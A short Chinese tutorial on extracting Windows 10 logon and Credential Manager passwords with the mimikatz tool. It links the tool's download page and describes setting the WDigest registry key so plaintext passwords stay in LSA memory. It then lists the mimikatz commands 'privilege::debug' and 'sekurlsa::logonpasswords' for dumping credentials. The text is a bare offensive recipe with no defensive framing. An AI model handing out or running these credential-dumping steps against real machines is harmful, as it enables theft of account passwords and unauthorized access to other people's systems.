获取win10密码-开机和凭证管理器

工具：mimikatz

下载地址：https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210709　　如失效自行百度

帐户密码：

简单密码直接获取

复杂密码（大小写+特殊字符+数字）
（虽然微软很早就更新了补丁来防止获取windows的明文密码，可是能够修改注册表...
使 \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下的UseLogonCredentiald的键值为1 即表明WDigest的密码支持明文形式保存在LSA内存中）

 

运行mimikatz.exe

输入：privilege::debug

接着：sekurlsa::logonpasswords